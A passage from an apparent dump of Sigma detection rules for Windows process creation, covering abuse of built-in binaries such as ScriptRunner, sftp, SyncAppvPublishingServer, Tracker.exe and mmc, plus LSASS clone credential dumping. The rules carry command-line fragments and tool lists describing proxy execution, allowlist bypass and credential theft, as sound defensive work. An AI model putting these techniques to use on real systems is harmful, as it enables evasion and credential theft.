    "content": "title: Use of Scriptrunner.exe\nid: 64760eef-87f7-4ed3-93fd-655668ea9420\nstatus: test\ndescription: The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-01\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ScriptRunner.exe'\n        - OriginalFileName: 'ScriptRunner.exe'\n    selection_cli:\n        CommandLine|contains: ' -appvscript '\n    condition: all of selection*\nfalsepositives:\n    - Legitimate use when App-v is deployed\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml",
    "content": "title: Using SettingSyncHost.exe as LOLBin\nid: b2ddd389-f676-4ac4-845a-e00781a48e5f\nstatus: test\ndescription: Detects using SettingSyncHost.exe to run hijacked binary\nreferences:\n    - https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin\nauthor: Anton Kutepov, oscd.community\ndate: 2020-02-05\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1574.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    system_utility:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    parent_is_settingsynchost:\n        ParentCommandLine|contains|all:\n            - 'cmd.exe /c'\n            - 'RoamDiag.cmd'\n            - '-outputpath'\n    condition: not system_utility and parent_is_settingsynchost\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml",
    "content": "title: Use Of The SFTP.EXE Binary As A LOLBIN\nid: a85ffc3a-e8fd-4040-93bf-78aff284d801\nstatus: test\ndescription: Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/264\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-10\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sftp.exe' # The \"sftp.exe\" located in the OpenSSH directory has no OriginalFileName :(\n        CommandLine|contains:\n            # Since \"-D\" is a valid flag for other usage we assume the user is going to enter a path\n            # Either a full one like \"C:\\Windows\\System32\\calc.exe\" or a relative one \"..\\..\\..\\Windows\\System32\\calc.exe\"\n            # In my testing you can't execute direct binaries by their name via this method (if you found a way please update the rule)\n            - ' -D ..'\n            - ' -D C:\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml",
    "content": "title: Suspicious Driver Install by pnputil.exe\nid: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1\nstatus: test\ndescription: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin\nreferences:\n    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax\n    - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html\nauthor: Hai Vaknin @LuxNoBulIshit, Avihay eldad  @aloneliassaf, Austin Songer @austinsonger\ndate: 2021-09-30\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '-i'\n            - '/install'\n            - '-a'\n            - '/add-driver'\n            - '.inf'\n        Image|endswith: '\\pnputil.exe'\n    condition: selection\nfalsepositives:\n    - Pnputil.exe being used may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml",
    "content": "title: Suspicious GrpConv Execution\nid: f14e169e-9978-4c69-acb3-1cff8200bc36\nstatus: test\ndescription: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors\nreferences:\n    - https://twitter.com/0gtweet/status/1526833181831200770\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-19\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'grpconv.exe -o'\n            - 'grpconv -o'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml",
    "content": "title: Dumping Process via Sqldumper.exe\nid: 23ceaf5c-b6f1-4a32-8559-f2ff734be516\nstatus: test\ndescription: Detects process dump via legitimate sqldumper.exe binary\nreferences:\n    - https://twitter.com/countuponsec/status/910977826853068800\n    - https://twitter.com/countuponsec/status/910969424215232518\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/\nauthor: Kirill Kiryanov, oscd.community\ndate: 2020-10-08\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sqldumper.exe'\n        CommandLine|contains:\n            - '0x0110'\n            - '0x01100:40'\n    condition: selection\nfalsepositives:\n    - Legitimate MSSQL Server actions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml",
    "content": "title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code\nid: fbd7c32d-db2a-4418-b92c-566eb8911133\nrelated:\n    - id: fde7929d-8beb-4a4c-b922-be9974671667\n      type: obsolete\nstatus: test\ndescription: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: frack113\ndate: 2021-07-12\nmodified: 2022-10-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\SyncAppvPublishingServer.exe'\n        - OriginalFileName: 'syncappvpublishingserver.exe'\n    selection_cli:\n        CommandLine|contains: '\"n; '\n    condition: all of selection_*\nfalsepositives:\n    - App-V clients\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml",
    "content": "title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code\nid: 36475a7d-0f6d-4dce-9b01-6aeb473bbaf1\nstatus: test\ndescription: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: frack113\ndate: 2021-07-16\nmodified: 2022-06-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\SyncAppvPublishingServer.vbs'\n            - ';'  # at a minimum, a semi-colon is required\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml",
    "content": "title: Potential DLL Injection Or Execution Using Tracker.exe\nid: 148431ce-4b70-403d-8525-fcc2993f29ea\nstatus: test\ndescription: Detects potential DLL injection and execution using \"Tracker.exe\"\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/\nauthor: 'Avneet Singh @v3t0_, oscd.community'\ndate: 2020-10-18\nmodified: 2023-01-09\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\tracker.exe'\n        - Description: 'Tracker'\n    selection_cli:\n        CommandLine|contains:\n            - ' /d '\n            - ' /c '\n    filter_msbuild1:\n        CommandLine|contains: ' /ERRORREPORT:PROMPT '\n    filter_msbuild2:\n        # Example:\n        #   GrandparentImage: C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Msbuild\\Current\\Bin\\MSBuild.exe\n        #   ParentCommandLine: \"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe\" /nologo /nodemode:1 /nodeReuse:true /low:false\n        #   CommandLine: \"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\MSBuild\\Current\\Bin\\Tracker.exe\" @\"C:\\Users\\user\\AppData\\Local\\Temp\\tmp05c7789bc5534838bf96d7a0fed1ffff.tmp\" /c \"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.29.30133\\bin\\HostX86\\x64\\Lib.exe\"\n        ParentImage|endswith:\n            - '\\Msbuild\\Current\\Bin\\MSBuild.exe'\n            - '\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml",
    "content": "title: Use of TTDInject.exe\nid: b27077d6-23e6-45d2-81a0-e2b356eea5fd\nstatus: test\ndescription: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/\nauthor: frack113\ndate: 2022-05-16\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Image|endswith: 'ttdinject.exe'\n        - OriginalFileName: 'TTDInject.EXE'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml",
    "content": "title: Time Travel Debugging Utility Usage\nid: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a\nrelated:\n    - id: e76c8240-d68f-4773-8880-5c6f63595aaf\n      type: derived\nstatus: test\ndescription: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/\n    - https://twitter.com/mattifestation/status/1196390321783025666\n    - https://twitter.com/oulusoyum/status/1191329746069655553\nauthor: 'Ensar Şamil, @sblmsrsn, @oscd_initiative'\ndate: 2020-10-06\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1218\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\tttracer.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage by software developers/testers\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml",
    "content": "title: Lolbin Unregmp2.exe Use As Proxy\nid: 727454c0-d851-48b0-8b89-385611ab0704\nstatus: test\ndescription: Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/\nauthor: frack113\ndate: 2022-12-29\nmodified: 2024-06-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\unregmp2.exe'\n        - OriginalFileName: 'unregmp2.exe'\n    selection_cmd:\n        CommandLine|contains|windash: ' /HideWMP'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml",
    "content": "title: UtilityFunctions.ps1 Proxy Dll\nid: 0403d67d-6227-4ea8-8145-4e72db7da120\nstatus: test\ndescription: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/\nauthor: frack113\ndate: 2022-05-28\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'UtilityFunctions.ps1'\n            - 'RegSnapin '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml",
    "content": "title: Visual Basic Command Line Compiler Usage\nid: 7b10f171-7f04-47c7-9fa2-5be43c76e535\nstatus: test\ndescription: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Vbc/\nauthor: 'Ensar Şamil, @sblmsrsn, @oscd_initiative'\ndate: 2020-10-07\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\vbc.exe'\n        Image|endswith: '\\cvtres.exe'\n    condition: selection\nfalsepositives:\n    - Utilization of this tool should not be seen in enterprise environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml",
    "content": "title: Use of VisualUiaVerifyNative.exe\nid: b30a8bc5-e21b-4ca2-9420-0a94019ac56a\nstatus: test\ndescription: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac\n    - https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/\n    - https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2022-06-01\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\VisualUiaVerifyNative.exe'\n        - OriginalFileName: 'VisualUiaVerifyNative.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate testing of Microsoft UI parts.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml",
    "content": "title: Use of VSIISExeLauncher.exe\nid: 18749301-f1c5-4efc-a4c3-276ff1f5b6f8\nstatus: test\ndescription: The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-09\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\VSIISExeLauncher.exe'\n        - OriginalFileName: 'VSIISExeLauncher.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' -p '\n            - ' -a '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml",
    "content": "title: Use of Wfc.exe\nid: 49be8799-7b4d-4fda-ad23-cafbefdebbc5\nstatus: test\ndescription: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2022-06-01\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\wfc.exe'\n        - OriginalFileName: 'wfc.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use by a software developer\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolscript_register_app.yml",
    "content": "title: Potential Register_App.Vbs LOLScript Abuse\nid: 28c8f68b-098d-45af-8d43-8089f3e35403\nstatus: test\ndescription: Detects potential abuse of the \"register_app.vbs\" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.\nreferences:\n    - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20\n    - https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs\nauthor: Austin Songer @austinsonger\ndate: 2021-11-05\nmodified: 2022-07-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cscript.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'cscript.exe'\n              - 'wscript.exe'\n    selection_cli:\n        CommandLine|contains: '.vbs -register ' # register_app.vbs\n    condition: all of selection*\nfalsepositives:\n    - Other VB scripts that leverage the same starting command line flags\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml",
    "content": "title: Potential Credential Dumping Via LSASS Process Clone\nid: c8da0dfd-4ed0-4b68-962d-13c9c884384e\nstatus: test\ndescription: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity\nreferences:\n    - https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/\n    - https://twitter.com/Hexacorn/status/1420053502554951689\n    - https://twitter.com/SBousseaden/status/1464566846594691073?s=20\nauthor: Florian Roth (Nextron Systems), Samir Bousseaden\ndate: 2021-11-27\nmodified: 2023-03-02\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\Windows\\System32\\lsass.exe'\n        Image|endswith: '\\Windows\\System32\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mftrace_child_process.yml",
    "content": "title: Potential Mftrace.EXE Abuse\nid: 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e\nstatus: test\ndescription: Detects child processes of the \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) which can abused to execute arbitrary binaries.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-09\nmodified: 2023-08-03\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\mftrace.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use for tracing purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mmc_default_domain_gpo_modification_via_gpme.yml",
    "content": "title: Windows Default Domain GPO Modification via GPME\nid: dcff7e85-d01f-4eb5-badd-84e2e6be8294\nrelated:\n    - id: e5ac86dd-2da1-454b-be74-05d26c769d7d\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the use of the Group Policy Management Editor (GPME) to modify Default Domain or Default Domain Controllers Group Policy Objects (GPOs).\n    Adversaries may leverage GPME to make stealthy changes in these default GPOs to deploy malicious GPOs configurations across the domain without raising suspicion.\nreferences:\n    - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html\n    - https://adsecurity.org/?p=3377\n    - https://sdmsoftware.com/general-stuff/launching-the-new-gp-management-editor-from-the-command-line/\n    - https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/\nauthor: TropChaud\ndate: 2025-11-22\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    # \"C:\\Windows\\System32\\gpme.msc\" /s /gpobject:\"LDAP://<REDACTED>/cn<REDACTED>,cnpolicies,cnsystem,DC<REDACTED>,DClocal\"\n    selection_mmc:\n        - Image|endswith: '\\mmc.exe'\n        - OriginalFileName: 'MMC.exe'\n    selection_gpme:\n        CommandLine|contains|all:\n            - 'gpme.msc'\n            - 'gpobject:'\n    selection_default_gpos:\n        CommandLine|contains:\n            - '31B2F340-016D-11D2-945F-00C04FB984F9' # Default Domain Policy GUID\n            - '6AC1786C-016F-11D2-945F-00C04FB984F9' # Default Domain Controllers Policy GUID\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of GPME to modify GPOs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml",
    "content": "title: MMC20 Lateral Movement\nid: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd\nstatus: test\ndescription: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe\nreferences:\n    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing\nauthor: '@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)'\ndate: 2020-03-04\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        Image|endswith: '\\mmc.exe'\n        CommandLine|contains: '-Embedding'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mmc_rlo_abuse_pattern.yml",
    "content": "title: MMC Executing Files with Reversed Extensions Using RTLO Abuse\nid: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44\nstatus: experimental\ndescription: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.\nreferences:\n    - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf\n    - https://en.wikipedia.org/wiki/Right-to-left_override\n    - https://tria.ge/241015-l98snsyeje/behavioral2\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - attack.defense-evasion\n    - attack.t1218.014\n    - attack.t1036.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        - Image|endswith: '\\mmc.exe'\n        - OriginalFileName: 'MMC.exe'\n    selection_commandline:\n        CommandLine|contains: # While looking at these files the prefix of their name will look something like csm.pdf, but in reality it is msc file\n            - 'cod.msc'  # Reversed `.doc`\n            - 'fdp.msc'  # Reversed `.pdf`\n            - 'ftr.msc'  # Reversed `.rtf`\n            - 'lmth.msc'  # Reversed `.html`\n            - 'slx.msc'  # Reversed `.xls`\n            - 'tdo.msc'  # Reversed `.odt`\n            - 'xcod.msc'  # Reversed `.docx`\n            - 'xslx.msc'  # Reversed `.xlsx`\n            - 'xtpp.msc'  # Reversed `.pptx`\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative actions using MMC to execute misnamed `.msc` files.\n    - Unconventional but non-malicious usage of RLO or reversed extensions.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml",
    "content": "title: MMC Spawning Windows Shell\nid: 05a2ab7e-ce11-4b63-86db-ab32e763e11d\nstatus: test\ndescription: Detects a Windows command line executable started from MMC\nreferences:\n    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/\nauthor: Karneades, Swisscom CSIRT\ndate: 2019-08-05\nmodified: 2022-07-14\ntags:\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        ParentImage|endswith: '\\mmc.exe'\n    selection2:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wscript.exe'\n              - '\\cscript.exe'\n              - '\\sh.exe'\n              - '\\bash.exe'\n              - '\\reg.exe'\n              - '\\regsvr32.exe'\n        - Image|contains: '\\BITSADMIN'\n    condition: all of selection*\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mode_codepage_russian.yml",
    "content": "title: CodePage Modification Via MODE.COM To Russian Language\nid: 12fbff88-16b5-4b42-9754-cd001a789fb3\nrelated:\n    - id: d48c5ffa-3b02-4c0f-9a9e-3c275650dd0e\n      type: derived\nstatus: test\ndescription: |\n    Detects a CodePage modification using the \"mode.com\" utility to Russian language.\n    This behavior has been used by threat actors behind Dharma ransomware.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode\n    - https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html\n    - https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-01-17\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # VT Query: behavior:\"mode con cp select=1251\"\n    # VT Query: behavior:\"mode con cp select=866\"\n    selection_img:\n        - Image|endswith: '\\mode.com'\n        - OriginalFileName: 'MODE.COM'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' con '\n            - ' cp '\n            - ' select='\n        CommandLine|endswith:\n            - '=1251' # ANSI Cyrillic; Cyrillic (Windows) - Observed ITW by Dharma ransomware\n            - '=866' # OEM Russian; Cyrillic (DOS) - Observed ITW by other malware\n    condition: all of selection_*\nfalsepositives:\n    - Russian speaking people changing the CodePage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml",
    "content": "title: Potential Suspicious Mofcomp Execution\nid: 1dd05363-104e-4b4a-b963-196a534b03a1\nstatus: test\ndescription: |\n    Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.\n    The \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\n    Attackers abuse this utility to install malicious MOF scripts\nreferences:\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\n    - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml\n    - https://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\nmodified: 2023-04-11\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mofcomp.exe'\n        - OriginalFileName: 'mofcomp.exe'\n    selection_case:\n        - ParentImage|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wsl.exe'\n              - '\\wscript.exe'\n              - '\\cscript.exe'\n        - CommandLine|contains:\n              - '\\AppData\\Local\\Temp'\n              - '\\Users\\Public\\'\n              - '\\WINDOWS\\Temp\\'\n              - '%temp%'\n              - '%tmp%'\n              - '%appdata%'\n    filter_main_wmiprvse:\n        ParentImage: 'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n        CommandLine|contains: 'C:\\Windows\\TEMP\\'\n        CommandLine|endswith: '.mof'\n    filter_optional_null_parent:\n        # Sometimes the parent information isn't available from the Microsoft-Windows-Security-Auditing provider.\n        CommandLine|contains: 'C:\\Windows\\TEMP\\'\n        CommandLine|endswith: '.mof'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml",
